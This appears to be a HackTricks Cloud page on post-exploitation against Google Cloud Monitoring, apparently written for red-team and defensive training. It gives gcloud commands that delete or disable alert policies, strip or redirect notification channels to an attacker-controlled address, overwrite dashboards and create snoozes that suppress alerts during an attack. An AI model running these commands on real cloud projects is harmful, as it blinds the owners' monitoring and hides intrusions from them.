GCP - Monitoring Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Monitoring

Fore more information check:

For other ways to disrupt logs check:

`monitoring.alertPolicies.delete`

Delete an alert policy:

gcloud alpha monitoring policies delete <policy>

`monitoring.alertPolicies.update`

Disrupt an alert policy:

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

`monitoring.dashboards.update`

Modify a dashboard to disrupt it:

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
  displayName: New Dashboard with New Display Name
  etag: 40d1040034db4e5a9dee931ec1b12c0d
  gridLayout:
    widgets:
    - text:
        content: Hello World
  '''

`monitoring.dashboards.delete`

Delete a dashboard:

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

`monitoring.snoozes.create`

Prevent policies from generating alerts by creating a snoozer:

# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
    --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
    --start-time="2023-03-01T03:00:00.0-0500" \
    --end-time="2023-03-07T23:59:59.5-0500"

`monitoring.snoozes.update`

Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

`monitoring.notificationChannels.delete`

Delete a configured channel:

# Delete channel
gcloud alpha monitoring channels delete <channel>

`monitoring.notificationChannels.update`

Update labels of a channel to disrupt it:

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Logging Post Exploitation NextGCP - Pub/Sub Post Exploitation

Last updated 4 months ago